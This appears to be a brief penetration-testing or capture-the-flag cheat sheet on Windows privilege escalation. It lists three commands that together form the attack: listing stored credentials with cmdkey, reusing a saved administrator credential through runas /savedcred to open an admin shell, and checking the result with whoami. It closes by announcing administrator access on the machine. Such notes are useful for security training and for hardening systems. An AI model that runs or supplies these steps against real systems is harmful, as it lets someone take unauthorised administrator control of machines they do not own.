First: listing all the creds we have
cmdkey /list
Second: Open a session as Administrator from saved credentials
runas /savedcred /user:admin cmd.exe
Third: Run whoami on the new CMD session
whoami
Now we are admin on the machine!